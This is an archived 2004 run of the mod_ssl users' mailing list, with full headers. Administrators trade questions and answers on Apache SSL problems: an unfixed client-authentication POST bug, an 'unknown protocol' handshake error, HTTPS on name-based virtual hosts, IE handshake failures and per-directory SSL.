Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2003031900) with ESMTP id iBQ2rQXh027736
	for ; Sat, 25 Dec 2004 21:53:27 -0500 (EST)
Date: Sat, 25 Dec 2004 21:53:26 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Subject: Re: Client Authentication POST Problem
In-Reply-To: <1104029251.5493.2.camel@localhost>
Message-ID: 
References: 
 <1104029251.5493.2.camel@localhost>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 25 Dec 2004, Adolfo Bello wrote:

> It just doesn't work in Apache 2.0.x.
> Use Apache 1.3.x.

That doesn't sound like very good advice... if something is broken in
Apache 2.0.x, we should just fix it.  :-/

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 26 04:17:54 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2A3A3A8A91; Sun, 26 Dec 2004 04:17:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from server1050.gisol.com (server1050.gisol.com [216.240.136.125])
	by master.modssl.org (Postfix) with ESMTP id 8DD47A8A75
	for ; Sun, 26 Dec 2004 04:17:49 +0100 (CET)
Received: from [201.248.208.236] (helo=[192.168.0.224])
	by server1050.gisol.com with esmtp (Exim 4.43)
	id 1CiOua-0005Nz-8D
	for modssl-users@modssl.org; Sat, 25 Dec 2004 19:17:40 -0800
Subject: Re: Client Authentication POST Problem
From: Adolfo Bello 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
	 <1104029251.5493.2.camel@localhost>
	 
Content-Type: text/plain
Date: Sat, 25 Dec 2004 23:17:35 -0400
Message-Id: <1104031055.5493.10.camel@localhost>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.3-1mdk 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server1050.gisol.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - bisapi.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adolfo Bello 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 2004-12-25 at 21:53 -0500, Cliff Woolley wrote:
> On Sat, 25 Dec 2004, Adolfo Bello wrote:
> 
> > It just doesn't work in Apache 2.0.x.
> > Use Apache 1.3.x.
> 
> That doesn't sound like very good advice... if something is broken in
> Apache 2.0.x, we should just fix it.  :-/
> 
> --Cliff

I heartily agree.

Unfortunately, I've been waiting for more than a year for this problem
to be fixed in Apache 2.0.x :-(

This bug was opened on 2002-09-06

http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12355

Happy Holidays,

Adolfo Bello

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 26 04:52:48 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 463C1A8A91; Sun, 26 Dec 2004 04:52:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 98BD5A8A75
	for ; Sun, 26 Dec 2004 04:52:42 +0100 (CET)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2003031900) with ESMTP id iBQ3qRXh003407
	for ; Sat, 25 Dec 2004 22:52:28 -0500 (EST)
Date: Sat, 25 Dec 2004 22:52:27 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Subject: Re: Client Authentication POST Problem
In-Reply-To: <1104031055.5493.10.camel@localhost>
Message-ID: 
References:  
 <1104029251.5493.2.camel@localhost>  
 <1104031055.5493.10.camel@localhost>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 25 Dec 2004, Adolfo Bello wrote:

> I heartily agree.
> Unfortunately, I've been waiting for more than a year for this problem
> to be fixed in Apache 2.0.x :-(
> This bug was opened on 2002-09-06
> http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12355

Usually the trick to getting something really done around here is to keep
reminding somebody until it really gets their attention.  :)  Anyway I'll
forward this on to dev@httpd, and maybe we'll get a taker.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 26 05:13:03 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BE123A8ABD; Sun, 26 Dec 2004 05:13:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from server1050.gisol.com (server1050.gisol.com [216.240.136.125])
	by master.modssl.org (Postfix) with ESMTP id 39F43A8999
	for ; Sun, 26 Dec 2004 05:12:58 +0100 (CET)
Received: from [201.248.208.236] (helo=[192.168.0.224])
	by server1050.gisol.com with esmtp (Exim 4.43)
	id 1CiPlx-00029L-Ns
	for modssl-users@modssl.org; Sat, 25 Dec 2004 20:12:50 -0800
Subject: Re: Client Authentication POST Problem
From: Adolfo Bello 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
	 <1104029251.5493.2.camel@localhost>
	 
	 <1104031055.5493.10.camel@localhost>
	 
Content-Type: text/plain
Date: Sun, 26 Dec 2004 00:12:35 -0400
Message-Id: <1104034355.5493.17.camel@localhost>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.3-1mdk 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server1050.gisol.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - bisapi.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adolfo Bello 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 2004-12-25 at 22:52 -0500, Cliff Woolley wrote:
> On Sat, 25 Dec 2004, Adolfo Bello wrote:
> 
> > I heartily agree.
> > Unfortunately, I've been waiting for more than a year for this problem
> > to be fixed in Apache 2.0.x :-(
> > This bug was opened on 2002-09-06
> > http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12355
> 
> Usually the trick to getting something really done around here is to keep
> reminding somebody until it really gets their attention.  :)  Anyway I'll
> forward this on to dev@httpd, and maybe we'll get a taker.
> 
> --Cliff

Wow, that would be really great!!!

New hopes to get Back to the Future ;-)

Thanks.

Adolfo Bello

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 28 05:06:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CD6FDA8AB7; Tue, 28 Dec 2004 05:06:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hornet.wiznet.ca (hornet.wiznet.ca [216.138.223.229])
	by master.modssl.org (Postfix) with ESMTP id 40FDEA8A6D
	for ; Tue, 28 Dec 2004 05:06:42 +0100 (CET)
Received: from def.con.ca (def.con.ca [216.138.220.69])
	by hornet.wiznet.ca (Postfix) with ESMTP id 6D98231FA19
	for ; Mon, 27 Dec 2004 23:06:30 -0500 (EST)
Received: from localhost (localhost [127.0.0.1])
	by def.con.ca (Defense Condition - NORAD) with ESMTP id 48D987850F
	for ; Mon, 27 Dec 2004 23:06:29 -0500 (EST)
Received: from def.con.ca ([127.0.0.1])
 by localhost (turbine [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 04558-10 for ;
 Mon, 27 Dec 2004 23:06:26 -0500 (EST)
Received: from inverness (inverness.brezh.nyet [10.80.1.2])
	by def.con.ca (Defense Condition - NORAD) with ESMTP id D664C78327
	for ; Mon, 27 Dec 2004 23:06:21 -0500 (EST)
From: "leandro asnaghi-nicastro" 
Organization: Capital of Nasty Electronic Magazine
To: modssl-users@modssl.org
Date: Mon, 27 Dec 2004 23:06:21 -0500
MIME-Version: 1.0
Subject: Apache and MOD_SSL
Message-Id: <184881104206776-58895533121b@inverness.def.con.ca>
X-mailer: Pegasus Mail for Windows (4.21c)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-Virus-Scanned: amavisd-new at def.con.ca
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "leandro asnaghi-nicastro" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello everyone.

I apologize for disturbing with this request, but I am a little 
stumped.

I have Linux Slackware 2.4 on a Duron 700 with 150 MB of ram or so.
I wanted access to SquirrelMail and I wanted to be able to do so with 
https, so that I was secure when doing it outside of the local 
network.

Despite generating the keys (password free) and signing them, 
configuring to what I believed to be correct (obviously not) conf 
files for mod_ssl and httpd, I get the following error:

    $ openssl s_client -connect def.con.ca:443 
    CONNECTED(00000003) 
    24271:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
    protocol:s23_clnt.c:475: 

I did some searching online and reading around someone suggested that 
I'd add the following to httpd.conf:

    LoadModule ssl_module libexec/libssl.so 
    AddModule mod_ssl.c 

There is no need:

    root@turbine:/etc/apache# apachectl configtest 
    [Mon Dec 27 22:08:58 2004] [warn] module ssl_module is already
    loaded, skipping 
    [Mon Dec 27 22:08:58 2004] [warn] module mod_ssl.c is already added,
    skipping 

Further reading online: add SSLEngine on within the Virtual Host 
setting (I'm guessing they meant in mod_ssl.conf?) and that is done.  
As well it was suggested that there may be a lack of directory.  
That's present as well.

Checking the status:

    root@turbine:/etc/apache# netstat -tln | grep 443 
    tcp        0      0 0.0.0.0:443             0.0.0.0:*              
    LISTEN  

Okay, so I'm not that off.

Obviously I am doing something wrong, albeit I am at a loss as to 
what excatly I screwed up.  Can someone kindly kick me in the right 
direction?

leandro
--
leandro asnaghi-nicastro - editor in chief - leandro@con.ca
capital of nasty electronic magazine - http://con.ca/
irc.con.ca #con / icq uin 889318 / msn msn@def.con.ca
"more annoying than any other leading brand"

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 28 12:35:15 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A6D71A8A91; Tue, 28 Dec 2004 12:35:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 4A020A8A6D
	for ; Tue, 28 Dec 2004 12:35:10 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 495447344D
	for ; Tue, 28 Dec 2004 12:37:25 +0100 (CET)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 20166-08 for ;
 Tue, 28 Dec 2004 12:37:22 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id B8E17C6553; Tue, 28 Dec 2004 12:37:22 +0100 (CET)
Date: Tue, 28 Dec 2004 12:37:22 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache and MOD_SSL
Message-ID: <20041228113722.GB20460@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <184881104206776-58895533121b@inverness.def.con.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <184881104206776-58895533121b@inverness.def.con.ca>
X-Mailer: mutt
X-Virus-Scanned: by amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Dec 27, 2004 at 11:06:21PM -0500, leandro asnaghi-nicastro wrote:
>     $ openssl s_client -connect def.con.ca:443 
>     CONNECTED(00000003) 
>     24271:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
>     protocol:s23_clnt.c:475: 
> 
That's usually what happens if the server is responding in HTTP instead
of HTTPS. You could try adding -state -debug to the openssl s_client
command to get more info. Also check your error log on the server, it
should have something about invalid method.
If def.con.ca is in fact the host with the problem, then I get the
following with -debug:

[SNIP]
0000 - 3c 21 44 4f 43 54 59                               Further reading online: add SSLEngine on within the Virtual Host 
> setting (I'm guessing they meant in mod_ssl.conf?) and that is done.  

It has to go inside the VirtualHost block for the port 443 vhost. You
also need a few other settings there pointing to the certificates. You
could try posting the ssl related part of that vhost.

>     root@turbine:/etc/apache# netstat -tln | grep 443 
>     tcp        0      0 0.0.0.0:443             0.0.0.0:*              
>     LISTEN  
> 
> Okay, so I'm not that off.
> 
Certainly there is something listening on port 443 - the s_client error
would have been different if there was nothing on that port.

> Obviously I am doing something wrong, albeit I am at a loss as to 
> what excatly I screwed up.  Can someone kindly kick me in the right 
> direction?
> 
It still looks like you don't have SSLEngine on in the right place.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 28 14:51:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A9E07A8999; Tue, 28 Dec 2004 14:51:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from electrodib.gotdns.org (ADijon-151-1-43-50.w83-196.abo.wanadoo.fr [83.196.19.50])
	by master.modssl.org (Postfix) with ESMTP id 16A19A8940
	for ; Tue, 28 Dec 2004 14:51:03 +0100 (CET)
Received: from seth.dib.lan ([192.168.1.12])
	by electrodib.gotdns.org with esmtp (Exim 4.34)
	id 1CjHZt-0002Oc-SD
	for modssl-users@modssl.org; Tue, 28 Dec 2004 14:39:57 +0100
Message-ID: <41D164C8.2040006@idee-informatique.com>
Date: Tue, 28 Dec 2004 14:51:04 +0100
From: didier Belot 
User-Agent: Mozilla Thunderbird 1.0 (X11/20041213)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: prevent https access to NBVH ?
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: didier Belot 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

Thank you all for reading and helping!

*** Yes, I know NBVH can't each have SSL access, thanks! ;-) ***

But, for now, my config permit to type

https://vhost2.domain.tld/

and see the content of www.domain.tld, which is the default SSL host.

Using apache 1.3.33, mod_ssl 2.8.22

The conf:

Listen 80
Listen 443
Port 443
ServerName www.domaine.tld
DocumentRoot /var/www/secure
SSLEngine off
...
NameVirtualHost *:80


ServerName www.domain.tld
DocumentRoot /var/www/secure
SSLEngine on



ServerName vhost1.domain.tld
DocumentRoot /var/www/vhost1



ServerName vhost2.domain.tld
DocumentRoot /var/www/vhost2


-- 
Didier Belot
Découvrez Firefox! 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 29 06:07:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 53C9CA8963; Wed, 29 Dec 2004 06:07:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from melaxmsw1.computershare.com.au (msw-gw.fmsc.com.au [203.4.181.77])
	by master.modssl.org (Postfix) with ESMTP id 8D229A8933
	for ; Wed, 29 Dec 2004 06:07:33 +0100 (CET)
Received: from melamail2.oceania.cshare.net (unverified) by 
    melaxmsw1.computershare.com.au (Content Technologies SMTPRS 4.3.14) with 
    ESMTP id  for 
    ; Wed, 29 Dec 2004 16:04:41 +1100
Received: from sydcmail1.oceania.cshare.net ([172.28.8.4]) by 
    melamail2.oceania.cshare.net with Microsoft SMTPSVC (5.0.2195.5329); Wed, 
    29 Dec 2004 16:07:26 +1100
X-MimeOLE: Produced By Microsoft Exchange V6.0.6556.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: problems with IE and mod_ssl
Date: Wed, 29 Dec 2004 16:07:25 +1100
Message-ID: <6F3745EC52C7064D9EBE6825076AAA860276C421@sydcmail1.oceania.cshare.net>
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: problems with IE and mod_ssl
Thread-Index: AcTtZEi/8J//vL5jSyi2UfuHypFiRA==
From: "Craig Reeson" 
To: 
X-OriginalArrivalTime: 29 Dec 2004 05:07:26.0042 (UTC) 
    FILETIME=[4997E3A0:01C4ED64]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Craig Reeson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

guys,

I have mod_ssl working on my site.

It works fine with Mozilla/Firefox (regardless of OS), but it refuses to
work with IE. I have googled all the necessary things to get it working
with IE but nothing seems to work.

Logs:
tail -20 /var/log/apache/ssl_engine_log
| 3220: 63 67 69 3f 30 3e 06 09-60 86 48 01 86 f8 42 01
cgi?0>..`.H...B. |
| 3230: 08 04 31 16 2f 68 74 74-70 3a 2f 2f 77 77 77 2e
..1./http://www. |
| 3240: 74 72 75 73 74 63 65 6e-74 65 72 2e 64 65 2f 67
trustcenter.de/g |
| 3250: 75 69 64 65 6c 69 6e 65-73 2f 69 6e 64 65 78 2e
uidelines/index. |
| 3260: 68 74 6d 6c 30 28 06 09-60 86 48 01 86 f8 42 01
html0(..`.H...B. |
| 3270: 0d 04 1b 16 19 54 43 20-54 72 75 73 74 43 65 6e  .....TC
TrustCen |
| 3280: 74 65 72 20 43 6c 61 73-73 20 31 20 43 41 30 11  ter Class 1
CA0. |
| 3290: 06 09 60 86 48 01 86 f8-42 01 01 04 04 03 02 00
..`.H...B....... |
| 32a0: 07 30 0d 06 09 2a 86 48-86 f7 0d 01 01 04 05 00
.0...*.H........ |
| 32b0: 03 81 81 00 05 42 52 26-a4 0c 27 01 44 ac 5c 25
.....BR&..'.D.\% |
| 32c0: 28 c2 44 42 54 08 b9 1d-c5 3e 6c 59 66 c4 b3 4e
(.DBT....>lYf..N |
| 32d0: 50 a7 f8 f8 96 75 a1 96-75 e8 16 38 a0 cd 5d 6e
P....u..u..8..]n |
| 32e0: fa 79 a7 1b 7b 1d 1e c3-                         .y..{...
|
+-----------------------------------------------------------------------
--+
[29/Dec/2004 15:08:03 09262] [debug] OpenSSL: I/O error, 4096 bytes
expected to write on BIO#0864FD10 [mem: 08198D48]
[29/Dec/2004 15:08:03 09262] [debug] OpenSSL: I/O error, 4096 bytes
expected to write on BIO#0864FD10 [mem: 08198D48]
[29/Dec/2004 15:08:03 09262] [trace] OpenSSL: Exit: error in SSLv3 write
certificate B
[29/Dec/2004 15:08:03 09262] [trace] OpenSSL: Exit: error in SSLv3 write
certificate B
[29/Dec/2004 15:08:03 09262] [error] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[29/Dec/2004 15:08:03 09262] [error] System: Broken pipe (errno: 32)

conf:
LoadModule ssl_module libexec/apache/libssl.so

Listen 80
Listen 443


AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl


SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:/var/log/apache/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex  file:/var/log/apache/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLLog      /var/log/apache/ssl_engine_log
SSLLogLevel debug


Alias /mantis/ "/home/support/mantis/"
Alias /files/ "/home/support/files/"

        ServerName support-au.xxxx.com
        DocumentRoot /home/support
        ServerAlias mantis.xxxx.com.au
        ServerAlias mantis.xxxx.xxxx.net
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ServerAlias xxxx.xxxx.com.au
        ScriptAlias /cgi-bin/ "/home/support/cgi-bin/"
        ErrorLog /var/log/apache/support-error_log
        CustomLog /var/log/apache/support-access_log common

        Options ExecCGI Includes FollowSymLinks
        AllowOverride None
        Order allow,deny
        Allow from all

SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /etc/apache/ssl.crt/support-au-rsa.crt
SSLCertificateKeyFile /etc/apache/ssl.key/support-au-rsa.key
SSLCertificateChainFile /etc/apache/ssl.crt/ca-bundle.crt
BrowserMatch MSIE nokeepalive ssl-unclean-shutdown downgrade-1.0
force-response-1.0
CustomLog /var/log/apache/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
                                 =20


any ideas whats going on?

thanks,

Craig



---
This email and any files transmitted with it are solely intended for the us=
e of the addressee(s) and may contain information that is confidential and =
privileged.  If you receive this email in error, please advise us by return=
 email immediately.  Please also disregard the contents of the email, delet=
e it and destroy any copies immediately.
Computershare Limited and its subsidiaries do not accept liability for the =
views expressed in the email or for the consequences of any computer viruse=
s that may be transmitted with this email.
This email is also subject to copyright.  No part of it should be reproduce=
d, adapted or transmitted without the written consent of the copyright owne=
r.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan  1 00:41:15 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CDDC5A8940; Sat,  1 Jan 2005 00:41:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nwc.com (mail.nwc.com [128.230.97.51])
	by master.modssl.org (Postfix) with ESMTP id 2D619A8933
	for ; Sat,  1 Jan 2005 00:41:09 +0100 (CET)
X-SpamCatcher-Score:   2 [X]
Received: from [129.44.206.83] (account mfratto HELO bitchin)
  by nwc.com (CommuniGate Pro SMTP 4.2.7)
  with ESMTP-TLS id 4042866 for modssl-users@modssl.org; Fri, 31 Dec 2004 18:40:50 -0500
From: "Mike Fratto" 
To: 
Subject: Enable/disable SSL in virutal hosts
Date: Fri, 31 Dec 2004 18:40:45 -0500
Message-ID: <000a01c4ef92$266abe90$0b1f10ac@bitchin>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Fratto" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am trying to configure apache 1.3.33 with modssl2.8.22-1.3.33 on a =
virual
host but only for a specific directory. I have SSL working for the doc =
root
for various virtual hosts. I have read through the mod_ssl docs, and
O'Reilly's Apache guide, but I haven't been able to get it to work.=20

Specifically, for the servername sam, when a browser hits the =
DocumentRoot,
I want to ensure that SSL is not invoked (just for performance reasons) =
but
when a user hits /admin, then SSL must be invoked. I have tried various
tweaks to no avail (the virtual host section is below). I know that I am
using the correct httpd.conf file because when I fat finger a directive, =
and
stop and start apache, I get an error. Changes to SSLEngine off|on seem =
to
have no effect.

Any ideas, thanks.


NameVirtualHost 192.168.10.50:80



# Disable SSL first
SSLEngine off


        SSLEngine off
        ServerAdmin root@localhost
        DocumentRoot /www/htdocs
        ServerName storage
        ErrorLog logs/error_log
        CustomLog logs/access_log combined



        SSLEngine off
        ServerAdmin root@localhost
        DocumentRoot /www/sam
        ServerName sam
        ErrorLog logs/sam_error_log
        CustomLog logs/sam_access_log combined



        SSLEngine on
        ServerName sam
        DocumentRoot /www/sam
        SSLCertificateFile /www/conf/ssl.crt/sam.cert
        SSLCertificateKeyFile /www/conf/ssl.key/sam.key
        SSLVerifyClient 0
        ErrorLog logs/sam_error_log
        CustomLog logs/sam_access_log combined

        
                SSLRequireSSL
                SSLOptions +StrictRequire
#               AuthType basic
#               AuthName admin
#               AuthUserFile /www/auth/admin-users
#               AuthGroupFile /www/auth/groups
#               require valid-user
        



        SSLDisable
        ServerAdmin root@localhost
        DocumentRoot /www/mike
        ServerName mike
        ErrorLog logs/mike_error_log
        CustomLog logs/mike_access_log combined


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan  1 01:08:33 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5BD45A89E6; Sat,  1 Jan 2005 01:08:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id 8BC8EA8982
	for ; Sat,  1 Jan 2005 01:08:21 +0100 (CET)
Received: from DTALAPTOP02 (AC9AF621.ipt.aol.com [172.154.246.33]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Fri, 31 Dec 2004 19:08:03 -0500
From: "David T. Ashley" 
To: 
Subject: RE: Enable/disable SSL in virutal hosts
Date: Fri, 31 Dec 2004 19:11:52 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
In-Reply-To: <000a01c4ef92$266abe90$0b1f10ac@bitchin>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Mike,

Thanks for the information.  You've provided more information than most
posters, including corroboration that the server is reading the
configuration file.

Unfortunately, as best I can tell, you haven't indicated what exactly isn't
working.

Is it that when you visit the DocumentRoot, SSL is invoked?

Or is it when you visit /admin, SSL is not invoked?

Or is it something else not working?

Additionally, it would be helpful if you paste in the entire configuration
file (not just an excerpt).

One thing that catches my eye is immediately is that directories are
normally declared outside the virtual hosts sections and then Alias'd in.
I'd need to see the whole configuration file to get context on what you're
doing.

Best regards and happy new year!

Dave.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Mike Fratto
Sent: Friday, December 31, 2004 6:41 PM
To: modssl-users@modssl.org
Subject: Enable/disable SSL in virutal hosts


